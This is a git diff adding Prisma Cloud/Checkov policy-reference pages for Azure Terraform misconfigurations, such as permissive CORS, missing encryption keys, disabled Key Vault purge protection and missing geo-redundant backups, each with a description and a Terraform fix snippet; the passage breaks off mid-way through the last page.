b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-app-services.adoc @@ -0,0 +1,53 @@ +== CORS allows resource to access app services + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 50ef4f8f-614c-43dc-84bb-f22dbbbd1a8a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py[CKV_AZURE_57] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cross-Origin Resource Sharing (CORS) should not allow all domains to access your web application. +Allow only required domains to interact with your web app. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* cors + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... + site_config { ++ cors { ++ allowed_origins = ["192.0.0.1"] ++ } + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc new file mode 100644 index 000000000..6c65ccc48 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc @@ -0,0 +1,58 @@ +== CORS allows resources to access function apps + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1c775345-9c89-47fb-880f-f2a0c3be6f21 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py[CKV_AZURE_62] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cross-Origin Resource Sharing (CORS) should not allow all domains to access your Function app. +Allow only required domains to interact with your Function app. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app +* *Arguments:* site_config.cors + + +[source,go] +---- +{ + "resource "azurerm_function_app" "example" { + ... + site_config { ++ cors { ++ allowed_origins = ["192.0.0.1"] + } + + } + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc new file mode 100644 index 000000000..c10562176 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc @@ -0,0 +1,95 @@ +== Cosmos DB Accounts do not have CMKs encrypting data at rest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 51ba0997-2c15-4113-a1e9-81500b84e4fb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py[CKV_AZURE_100] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Data stored in Azure Cosmos account is automatically encrypted with keys managed by Microsoft (service-managed keys). +Customer-managed keys (CMKs) give users total control over the keys used by Azure Cosmos DB to encrypt their data at rest. +Built as an additional encryption layer on top of the Azure Cosmos DB default encryption at rest with service managed keys, it uses Azure Key Vault to store encryption keys and provides a way to implement double encryption. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* key_vault_key_id - (Optional) A versionless Key Vault Key ID for CMK encryption. + +Changing this forces a new resource to be created. + + +[source,go] +---- +{ + "resource "azurerm_cosmosdb_account" "db" { + name = "tfex-cosmos-db-${random_integer.ri.result}" + location = azurerm_resource_group.rg.location + resource_group_name = azurerm_resource_group.rg.name + offer_type = "Standard" + kind = "GlobalDocumentDB" + + enable_automatic_failover = true + + capabilities { + name = "EnableAggregationPipeline" + } + + + capabilities { + name = "mongoEnableDocLevelTTL" + } + + + capabilities { + name = "MongoDBv3.4" + } + + + consistency_policy { + consistency_level = "BoundedStaleness" + max_interval_in_seconds = 10 + max_staleness_prefix = 200 + } + + + geo_location { + location = var.failover_location + failover_priority = 1 + } + + + geo_location { + location = azurerm_resource_group.rg.location + failover_priority = 0 + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption.adoc new file mode 100644 index 000000000..c7b17e6c0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-data-lake-store-accounts-enables-encryption.adoc @@ -0,0 +1,62 @@ +== Unencrypted Data Lake Store accounts + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02889fff-fde0-4b22-b63c-08d49724af32 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py[CKV_AZURE_105] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Data Lake Storage Gen2 is a set of capabilities dedicated to big data analytics, built on Azure Blob storage. +Data Lake Storage Gen2 converges the capabilities of Azure Data Lake Storage Gen1 with Azure Blob storage. +Data Lake Storage Gen1 supports encryption of data both at rest and in transit. +For data at rest, Data Lake Storage Gen1 supports "on by default," transparent encryption. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* xyz +* *Arguments:* encryption_state - (Optional) Is Encryption enabled on this Data Lake Store Account? + +Possible values are Enabled or Disabled. +Defaults to Enabled. +encryption_type - (Optional) The Encryption Type used for this Data Lake Store Account. +Currently can be set to ServiceManaged when encryption_state is Enabled - and must be a blank string when it's Disabled. + + +[source,go] +---- +{ + "resource "azurerm_data_lake_store" "example" { + ... + encryption_state = "Enabled" + encryption_type = "ServiceManaged" +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication.adoc new file mode 100644 index 000000000..943b34c75 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-function-apps-enables-authentication.adoc @@ -0,0 +1,56 @@ +== Azure Function App authentication is off +// Azure Function App authentication disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 90dc2872-7c50-4a57-a2af-4fc6fea535c5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py[CKV_AZURE_56] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service Authentication is a feature that can prevent anonymous HTTP requests from reaching the Function app, or authenticate those that have tokens before they reach the Function app. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app +* *Arguments:* auth_settings.enabled + + +[source,go] +---- +{ + "resource "azurerm_function_app" "example" { + ... + + auth_settings { + + enabled = true + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc new file mode 100644 index 000000000..132dd1736 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc @@ -0,0 +1,95 @@ +== Azure Function App doesn't use HTTP 2.0 +// Azure Function App does not use HTTP 2.0 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6865e87f-5045-4319-bc32-b659bde8e3a2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py[CKV_AZURE_67] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies Azure Function App which doesn't use HTTP 2.0. +HTTP 2.0 has additional performance improvements on the head-of-line blocking problem of the old HTTP version, header compression, and prioritization of requests. +HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own, more efficient, mechanisms for data streaming. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to the Azure portal + +. Navigate to Function App + +. Click on the reported Function App + +. Under Setting section, Click on 'Configuration' + +. Under 'General Settings' tab, In 'Platform settings', Set 'HTTP version' to '2.0' + +. Click on 'Save'. + + +* In Azure CLI* + + +If Function App Hosted in Linux using Consumption (Serverless) Plan follow below steps Azure CLI Command + + +[source,text] +---- +{ + " - az functionapp config set --http20-enable true --name MyFunctionApp --resource-group MyResourceGroup +", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app +* *Arguments:* site_config.http2_enabled + + +[source,go] +---- +{ + "resource "azurerm_function_app" "example" { + ... ++ site_config { ++ http2_enabled = true + } + + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc new file mode 100644 index 000000000..31bd11de0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc @@ -0,0 +1,59 @@ +== Azure App Service Web app does not use latest Java version + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5aebd2ef-e2d2-4b3a-8d35-70e1d2b4de79 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py[CKV_AZURE_83] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service web applications developed with the Java software stack should use the latest available version of Java to ensure the latest security fixes are in use. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* java_version - (Optional) The version of Java to use. + +If specified java_container and java_container_version must also be specified. +Possible values are 1.7, 1.8 and 11 and their specific versions - except for Java 11 (e.g. +1.7.0_80, 1.8.0_181, 11) + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... + site_config { ++ java_version = "11" + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection.adoc new file mode 100644 index 000000000..b238d96e1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection.adoc @@ -0,0 +1,59 @@ +== Azure Key Vault Purge protection is not enabled +// Azure Key Vault Purge protection disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5238e9c3-3e2e-4d94-b492-261eedc01a2e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py[CKV_AZURE_110] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Purge protection is an optional Key Vault behavior and is not enabled by default. +Purge protection can only be enabled once soft-delete is enabled. +It can be turned on via CLI or PowerShell. +When purge protection is on, a vault or an object in the deleted state cannot be purged until the retention period has passed. +Soft-deleted vaults and objects can still be recovered, ensuring that the retention policy will be followed. +The default retention period is 90 days, but it is possible to set the retention policy interval to a value from 7 to 90 days through the Azure portal. +Once the retention policy interval is set and saved it cannot be changed for that vault. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault +* *Arguments:* purge_protection_enabled - (Optional) Is Purge Protection enabled for this Key Vault? + +Defaults to false. + + +[source,go] +---- +resource "azurerm_key_vault" "example" { + ... ++ purge_protection_enabled = true +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete.adoc new file mode 100644 index 000000000..c0a093826 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-soft-delete.adoc @@ -0,0 +1,57 @@ +== Key vault does not enable soft-delete +// Key Vault does not enable soft-delete + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 01fb7eb5-26d1-4cfa-8c8e-eae7d5fa5683 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py[CKV_AZURE_111] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Deleting a key vault without soft delete enabled permanently deletes all secrets, keys, and certificates stored in the key vault. +Accidental deletion of a key vault can lead to permanent data loss. +Soft delete allows you to recover an accidentally deleted key vault for a configurable retention period. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault +* *Arguments:* soft_delete_retention_days - (Optional) The number of days that items should be retained for once soft-deleted. + +This value can be between 7 and 90 (the default) days. + + +[source,go] +---- +{ + "resource "azurerm_key_vault" "example" { + ... ++ soft_delete_retention_days = 7 +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm.adoc new file mode 100644 index 000000000..1d6356f38 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm.adoc @@ -0,0 +1,62 @@ +== Key vault key is not backed by HSM +// Azure Key Vault key not backed by HSM + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 13e037b0-68b4-4cac-aca6-4df4c9f98192 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py[CKV_AZURE_112] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +For added assurance, when you use Azure Key Vault, you can import or generate keys in hardware security modules (HSMs) that never leave the HSM boundary. +This scenario is often referred to as bring your own key, or BYOK. +Azure Key Vault uses nCipher nShield family of HSMs (FIPS 140-2 Level 2 validated) to protect your keys. +You should be aware of the cost implications of using an HSM and whether this fits in with your security posture. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault_key +* *Arguments:* key_type - (Required) Specifies the Key Type to use for this Key Vault Key. + +Possible values are EC (Elliptic Curve), EC-HSM, Oct (Octet), RSA and RSA-HSM. +Changing this forces a new resource to be created. + + +[source,go] +---- +{ + "resource "azurerm_key_vault_key" "generated" { + ... ++ key_type = "RSA-HSM" + ... +}", + +} +---- + +Select an option with "-HSM" to pass this check. diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set.adoc new file mode 100644 index 000000000..a37387043 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set.adoc @@ -0,0 +1,61 @@ +== Key vault secrets do not have content_type set +// Azure Key Vault secrets content_type not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bf534684-b59a-4ce7-b012-430296bb7120 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretContentType.py[CKV_AZURE_114] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Key Vault is a service for Secrets management to securely store and control access to tokens, passwords, certificates, API keys, and other secrets. +A content type tag helps identify whether a secret is a password, connection string, etc. +Different secrets have different rotation requirements. +Content type tag should be set on secrets. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault +* *Arguments:* content_type - (Optional) Specifies the content type for the Key Vault Secret. + + +[source,go] +---- +{ + "resource "azurerm_key_vault" "example" { + name = "examplekeyvault" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "premium" + soft_delete_retention_days = 7 + + content_type = "text/plain" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc new file mode 100644 index 000000000..270aa29fb --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc @@ -0,0 +1,61 @@ +== Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dd3f21d1-4b56-4a6d-a4ad-58b126d2791b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py[CKV_AZURE_93] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Requiring a specific set of disk encryption sets to be used with managed disks give you control over the keys used for encryption at rest. +You are able to select the allowed encrypted sets and all others are rejected when attached to a disk. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_managed_disk +* *Arguments:* disk_encryption_set_id + + +[source,go] +---- +{ + " resource "azurerm_managed_disk" "source" { + name = "acctestmd1" + location = "West US 2" + resource_group_name = azurerm_resource_group.example.name + storage_account_type = "Standard_LRS" + create_option = "Empty" + disk_size_gb = "1" ++ disk_encryption_set_id = "koko" + tags = { + environment = "staging" + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc new file mode 100644 index 000000000..839cbb6f4 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc @@ -0,0 +1,74 @@ +== Azure App Service Web app does not have a Managed Service Identity + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 21380788-802e-45bb-9927-779c7a3ff255 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py[CKV_AZURE_71] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Managed service identity in App Service makes the app more secure by eliminating secrets from the app, such as credentials in the connection strings. +When registering with Azure Active Directory in the app service, the app will connect to other Azure services securely without the need of username and passwords. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to the Azure portal. + +. Navigate to App Services. + +. Click on the reported App. + +. Under Setting section, Click on 'Identity'. + +. Ensure that 'Status' is set to 'On'. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* identity.type + + +[source,go] +---- +{ + " resource "azurerm_app_service" "example" { + ... + + identity { + + type = "SystemAssigned" + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups.adoc new file mode 100644 index 000000000..7c14e00bb --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups.adoc @@ -0,0 +1,85 @@ +== MariaDB server does not enable geo-redundant backups +// MariaDB server geo-redundant backups not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2bd10e93-cbe7-4224-98bd-6fb5472d5418 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py[CKV_AZURE_129] + +|Severity +|LOW + +|Subtype +|Build +//,Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that your Microsoft Azure MariaDB database servers have geo-redundant backups enabled, to allow you to restore your MariaDB servers to a different Azure region in the event of a regional outage or a disaster. +Geo-restore is the default recovery option when your MariaDB database server is unavailable because of a large-scale incident, such as a natural disaster, occurs in the region where the database server is hosted. + +.During geo-restore, the MariaDB server configuration can be changed. +These configuration changes include compute generation, vCore, backup retention period and backup redundancy options. +//// +=== Fix - Runtime +* In Azure console* + + +. Sign in to * Azure Management Console*. + +. Navigate to * All resource**s blade at https://portal.azure.com/#blade/HubsExtension/BrowseAll to access all your Microsoft Azure resources. + +. From the Type filter box, select Azure Database for MariaDB server to list the MariaDB servers provisioned within your Azure account. + +. Click on the name of the MariaDB database server that you want to examine. + +. In the navigation panel, under Settings, select Pricing tier to access the pricing tier settings available for the selected MariaDB server. + +. On the Pricing tier page, in the Backup Redundancy Options section, check the backup redundancy tier configured for the database server. ++ +If the selected tier is Locally Redundant, the data can be recovered from within the current region only, therefore the Geo-Redundant backup feature is not enabled for the selected Microsoft Azure MariaDB database server. + +. Repeat steps no. ++ +4 -- 6 for each MariaDB database server available in the current Azure subscription. + +. Repeat steps no. ++ +3 -- 7 for each subscription created in your Microsoft Azure cloud account. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_server +* *Arguments:* geo_redundant_backup_enabled + + +[source,go] +---- +{ + " resource "azurerm_mariadb_server" "example" { + ... ++ geo_redundant_backup_enabled = true + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc new file mode 100644 index 000000000..8ea55f314 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc @@ -0,0 +1,73 @@ +== Microsoft Antimalware is not configured to automatically update Virtual Machines +// Microsoft Antimalware not configured to automatically update Virtual Machines + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1a58fc83-8975-442f-8448-ec3f00893de8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml[CKV2_AZURE_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy audits any Windows virtual machine not configured with automatic update of Microsoft Antimalware protection signatures. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_virtual_machine, azurerm_virtual_machine_extension +* *Arguments:* virtual_machine_id (of * azurerm_virtual_machine_extension* ) + + +[source,go] +---- +{ + "resource "azurerm_virtual_machine" "virtual_machine_good_1" { + name = "acctvm" + location = "location" + resource_group_name = "group" + network_interface_ids = ["id"] + vm_size = "Standard_F2" + storage_os_disk { + name = "myosdisk1" + caching = "ReadWrite" + create_option = "FromImage" + } + +} + + +resource "azurerm_virtual_machine_extension" "extension_good_1" { + name = "hostname" ++ virtual_machine_id = azurerm_virtual_machine.virtual_machine_good_1.id + publisher = "Microsoft.Azure.Security" + type = "IaaSAntimalware" + type_handler_version = "2.0" + auto_upgrade_minor_version = true +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups.adoc new file mode 100644 index 000000000..5e1bfad29 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups.adoc @@ -0,0 +1,85 @@ +== My SQL server disables geo-redundant backups +// My SQL server geo-redundant backups disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3e47b7e8-5bd9-4b23-8d8e-90ed96249654 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py[CKV_AZURE_94] + +|Severity +|LOW + +|Subtype +|Build +//,Runtime + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that your Microsoft Azure My SQL database servers have geo-redundant backups enabled, to allow you to restore your My SQL servers to a different Azure region in the event of a regional outage or a disaster. +Geo-restore is the default recovery option when your My SQL database server is unavailable because of a large-scale incident, such as a natural disaster, occurs in the region where the database server is hosted. + +.During geo-restore, the My SQL server configuration can be changed. +These configuration changes include compute generation, vCore, backup retention period and backup redundancy options. +//// +=== Fix - Runtime +* In Azure console* + + +. Sign in to * Azure Management Console*. + +. Navigate to * All resource**s blade at https://portal.azure.com/#blade/HubsExtension/BrowseAll to access all your Microsoft Azure resources. + +. From the Type filter box, select Azure Database for My SQL server to list the My SQL servers provisioned within your Azure account. + +. Click on the name of the My SQL database server that you want to examine. + +. In the navigation panel, under Settings, select Pricing tier to access the pricing tier settings available for the selected My SQL server. + +. On the Pricing tier page, in the Backup Redundancy Options section, check the backup redundancy tier configured for the database server. ++ +If the selected tier is Locally Redundant, the data can be recovered from within the current region only, therefore the Geo-Redundant backup feature is not enabled for the selected Microsoft Azure My SQL database server. + +. Repeat steps no. ++ +4 -- 6 for each My SQL database server available in the current Azure subscription. + +. Repeat steps no. ++ +3 -- 7 for each subscription created in your Microsoft Azure cloud account. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* geo_redundant_backup_enabled + + +[source,go] +---- +{ + "resource "azurerm_mysql_server" "example" { + ... ++ geo_redundant_backup_enabled = true +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy.adoc new file mode 100644 index 000000000..cb80c8e82 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy.adoc @@ -0,0 +1,55 @@ +== My SQL server does not enable Threat Detection policy +// My SQL server Threat Detection policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2c15b15-6ca3-4c3f-a4de-923ff60abd26 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py[CKV_AZURE_127] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Advanced Threat Detection on your non-Basic tier Azure database for MySQL servers to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* threat_detection_policy.enabled + + +[source,text] +---- +{ + "resource "azurerm_mysql_server" "example" { + ... ++ threat_detection_policy { ++ enabled = true + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc new file mode 100644 index 000000000..601b0d8a6 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc @@ -0,0 +1,122 @@ +== MySQL server does not enable customer-managed key for encryption +// MySQL server customer-managed key for encryption disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e0fb57de-942d-4e6e-b9df-3342c415bc21 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_16] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your MySQL servers. +By default, the data is encrypted at rest with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group,azurerm_key_vault, azurerm_key_vault_access_policy, azurerm_key_vault_key, 